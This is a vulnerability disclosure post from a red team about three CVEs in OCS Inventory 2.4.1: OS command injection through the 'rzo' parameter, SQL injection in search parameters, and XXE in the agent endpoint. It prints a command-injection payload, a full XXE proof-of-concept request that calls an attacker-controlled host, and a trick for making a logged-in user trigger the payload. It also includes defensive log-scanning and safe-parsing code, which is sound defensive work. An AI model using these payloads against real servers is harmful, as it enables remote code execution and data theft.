During a Red Team operation, multiple vulnerabilities were discovered in OCS Inventory (version 2.4.1). The following CVEs have been assigned to the vulnerabilities:

CVE-2018-12482 (Multiple SQL Injections in the search engine)

CVE-2018-12483 (Remote Command Execution)

CVE-2018-14473 (XXE).

Introduction

OCS Inventory is inventory software widely used in corporations to monitor their computers via agents (for Linux and Windows) deployed on the machines. The agents collect information from the computers and send it to an HTTP endpoint on a master server. In addition to monitoring, OCS Inventory allows software to be installed and OS commands to be executed from the master server on the computers where an agent is installed. Because of these capabilities the product is a critical asset and therefore of special interest to an attacker: if the OCS Inventory server is compromised, the attacker would be able to deploy any kind of software on every machine where an agent is installed.

During the operation, the Red Team identified this software inside the client's network, so the logical step was to install a local copy of OCS Inventory to analyze its inner workings and uncover vulnerabilities that could be used in the operation.

CVE-2018-12483 – Remote Command Execution

When the code of the “OCSReports” component is analyzed, the use of an external Perl script for IP discovery is quickly observed:

    function runCommand($command = "", $fname) {
        $command = "perl ipdiscover-util.pl $command -xml -h=" . SERVER_READ . " -u=" . COMPTE_BASE . " -p=" . PSWD_BASE . " -d=" . DB_NAME . " -path=" . $fname;
        exec($command);
    }

The Perl script is executed as a system command via the exec() function, which receives a string into which the parameters have been concatenated. Searching the source code for references to this function yields a single match:

    //ms_ipdiscover_analyse.php
    $pas = $protectedGet['rzo'];
    $values = look_config_default_values(array('IPDISCOVER_IPD_DIR'), '', array('IPDISCOVER_IPD_DIR' => array('TVALUE' => VARLIB_DIR)));
    $fname = $values['tvalue']['IPDISCOVER_IPD_DIR'];
    $file_name = $fname . "/ipd/" . $pas . ".ipd";
    //reset cache?
    if (is_defined($protectedPost['reset'])) {
        unlink($file_name);
        reloadform_closeme('', true);
    } else {
        if (!is_readable($file_name))
            runCommand("-cache -net=" . $pas, $fname);
    }

The parameters passed to the runCommand function are not filtered in any way, so this functionality can be abused to execute arbitrary commands on the OS. Since we control $pas (it takes its value from the GET parameter “rzo”), we can inject commands by building a string like this one:

    perl ipdiscover-util.pl -cache -net=;id > /tmp/pwned;#-xml -h=...

Exploiting this vulnerability requires being authenticated on the web platform, so if a valid user is not available another option is to hijack a session by exploiting any of the myriad XSS flaws it has. In the context of the Red Team exercise where the vulnerability was discovered, it was decided to force an authenticated user to load in their browser an image pointing to a URL carrying the payload (the browser sends a GET request with the malicious payload when the image is rendered).

CVE-2018-12482 – Multiple SQL Injections

The search engine implemented in OCS Inventory does not adequately filter the parameters used within SQL statements, making it possible to inject arbitrary SQL code. Some of the injection points:

GET and POST parameter “values” when searching from the section “Inventory -> Search with various criteria data”. When a search tag is selected (for example “Network: IPADDRESS”), the resulting SQL statement is:

    select distinct HARDWARE_ID,
        networks.DESCRIPTION as 'Network: Description',
        networks.TYPE as 'Network: Type',
        networks.TYPEMIB as 'Network: MibType',
        networks.SPEED as 'Network: Speed',
        networks.MACADDR as 'Network: MAC Address',
        networks.STATUS as 'Network: Status',
        networks.IPADDRESS as 'Network: IP Address',
        networks.IPMASK as 'Network: IP Netmask',
        networks.IPSUBNET as 'Network: Subnetwork IP',
        networks.IPGATEWAY as 'Network: Gateway IP',
        networks.IPDHCP as 'Network: DHCP IP'
    from networks
    where ( ( IPADDRESS = '[INJECT HERE]'))

Because the value is not filtered properly, a single quote (') closes the string literal and the payload can be injected after it.

Parameters length, order and start. These parameters, used for the LIMIT and ORDER BY clauses of the SQL statement, are not filtered properly either, allowing arbitrary queries to be executed in the same way:

(Example: POST parameter length)

    ... GROUP BY netid) non_ident on non_ident.RSX=inv.RSX) toto order by ID asc limit 0 ,[inject here]
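As an added example (not code from the post or from OCS Inventory), the checks below turn the two injection points described above, the “rzo” parameter of ms_ipdiscover_analyse.php and the values/length/order/start parameters of the search engine, into detection rules run over constructed Apache-style access log lines. The /ocsreports/index.php path, the placement of the search parameters on GET requests and the dotted-quad shape of a legitimate rzo value are assumptions; POST bodies are not visible in access logs, so only the GET variants are covered.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed Apache-style access log lines (not real traffic): a benign request per
# injection point described above, each followed by an abusive one.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2018:10:00:01 +0200] "GET /ocsreports/ms_ipdiscover_analyse.php?rzo=192.168.1.0 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jun/2018:10:00:02 +0200] "GET /ocsreports/ms_ipdiscover_analyse.php?rzo=%3Bid%20%3E%20%2Ftmp%2Fpwned%3B%23 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jun/2018:10:00:03 +0200] "GET /ocsreports/index.php?values=10.0.0.1 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jun/2018:10:00:04 +0200] "GET /ocsreports/index.php?values=10.0.0.1%27 HTTP/1.1" 200 9000
10.0.0.7 - - [01/Jun/2018:10:00:05 +0200] "GET /ocsreports/index.php?start=0&length=20&order=ID HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jun/2018:10:00:06 +0200] "GET /ocsreports/index.php?start=0&length=20%27&order=ID HTTP/1.1" 500 300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
SHELL_META = re.compile(r'[;|&`$<>\n]')            # characters that let rzo break out of the perl command line
NETWORK = re.compile(r'^\d{1,3}(\.\d{1,3}){3}$')    # assumed shape of a legitimate -net= value (dotted quad)
IDENT = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*$')    # a bare column name, the only thing order should hold

def check_params(params):
    """Return (cve, parameter, value) findings for one request's decoded query parameters."""
    findings = []
    for raw in params.get('rzo', []):
        if SHELL_META.search(raw) or not NETWORK.match(raw):
            findings.append(('CVE-2018-12483', 'rzo', raw))
    for raw in params.get('values', []):
        if "'" in raw:                       # a single quote closes the literal in the WHERE clause
            findings.append(('CVE-2018-12482', 'values', raw))
    for name in ('length', 'start'):         # both end up unquoted inside LIMIT
        for raw in params.get(name, []):
            if not raw.isdigit():
                findings.append(('CVE-2018-12482', name, raw))
    for raw in params.get('order', []):      # ends up unquoted inside ORDER BY
        if not IDENT.match(raw):
            findings.append(('CVE-2018-12482', 'order', raw))
    return findings

def scan_log(text):
    """Return (client_ip, cve, parameter, value) for every suspicious OCSReports request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group('target'))
        if not target.path.startswith('/ocsreports/'):
            continue
        params = parse_qs(target.query, keep_blank_values=True)
        for cve, name, value in check_params(params):
            hits.append((m.group('ip'), cve, name, value))
    return hits
```

Running scan_log over a real access log is enough to surface the three abusive lines; the benign requests produce no findings.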

CVE-2018-14473 – XXE

Communication between the agents and the OCS Inventory master server is done over HTTP, sending the information to an endpoint. The information is structured as XML, which the server parses to extract the data. Due to an inadequate parser configuration it is possible to use external entities which, when processed by the XML parser, allow sensitive information to be exfiltrated from the machine.

As a proof of concept, a local web server can be started on our own machine to act as a canary, and the following request sent to the endpoint:

    POST /ocsinventory HTTP/1.1
    Host: xxxxxxxxxxxxxxx
    User-Agent: OCS-NG_WINDOWS_AGENT_v2.3.1.1
    Accept: */*
    Content-Type: application/xml
    Content-Length: 160
    Expect: 100-continue
    Connection: close

    <?xml version="1.0" encoding="UTF-8" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "https://ourserver/?pwned">
    ]>
    <REQUEST>&sp;</REQUEST>

When the XML is processed, the entity &sp; is expanded and the OCS Inventory server makes a request to our canary, confirming the existence of the vulnerability.
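As an added example (not code from the post or from OCS Inventory), a Python check of the kind an agent endpoint could apply to every body before acting on it: it refuses any document carrying a DOCTYPE or entity declaration, which is exactly what the proof-of-concept request above needs in order to declare its external entity. The request bodies are constructed and the canary URL is a placeholder.

```python
import xml.parsers.expat

# Constructed request bodies (not captured traffic): the shape of an ordinary agent
# request, and the DOCTYPE-bearing body from the proof of concept above with the
# canary URL replaced by a placeholder.
BENIGN_BODY = '<?xml version="1.0" encoding="UTF-8"?><REQUEST><QUERY>PROLOG</QUERY></REQUEST>'
XXE_BODY = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://canary.invalid/?x"> ]>'
            '<REQUEST>&sp;</REQUEST>')

class UnsafeXML(ValueError):
    """Raised for any body the endpoint should refuse before acting on it."""

def parse_agent_request(body):
    """Parse an agent body into (tag, text) pairs; refuse DOCTYPE and entity declarations."""
    parser = xml.parsers.expat.ParserCreate()
    parsed = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires as soon as <!DOCTYPE is seen, before any entity can be declared or used.
        raise UnsafeXML(f'DOCTYPE {name!r} is not accepted from agents')

    def reject_entity(*decl):
        raise UnsafeXML('entity declarations are not accepted from agents')

    def on_start(name, attrs):
        parsed.append([name, ''])

    def on_text(data):
        if parsed:
            parsed[-1][1] += data   # expat may deliver text in several chunks

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    try:
        parser.Parse(body, True)    # exceptions raised in handlers propagate out of Parse
    except xml.parsers.expat.ExpatError as err:
        raise UnsafeXML(f'malformed XML: {err}') from err
    return [tuple(item) for item in parsed]

def is_accepted(body):
    """True when the body parses cleanly under the rules above."""
    try:
        parse_agent_request(body)
        return True
    except UnsafeXML:
        return False
```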

Conclusion

One of the most distinctive characteristics of Tarlogic’s Red Team is its dedication to analyzing the software used by its clients in order to find vulnerabilities that can be exploited in a real-life scenario. These activities frequently result in the discovery of 0-days. Some of the more interesting ones are published on this blog (like the present post, or as was done with the RCE in Cobian Backup), and others are only reported to the pertinent authorities (as was done with the UbiQuoss VP5208A switch).

Always consider the possibility that an attacker uses unpublished vulnerabilities to compromise a machine. It is at this point that the measures implemented during the hardening phase should make lateral movement and privilege escalation more difficult or even impossible. Likewise, deploying WAFs in front of critical internal applications of this kind can prevent, or make considerably harder, the exploitation of this type of vulnerability in web applications.

OCS Inventory has released a new version (2.5) that fixes these issues.

Greetings

Jaume Llopis (@jks___), Pablo Martínez (@Xassiz) and Juan Manuel Fernández (@TheXC3LL)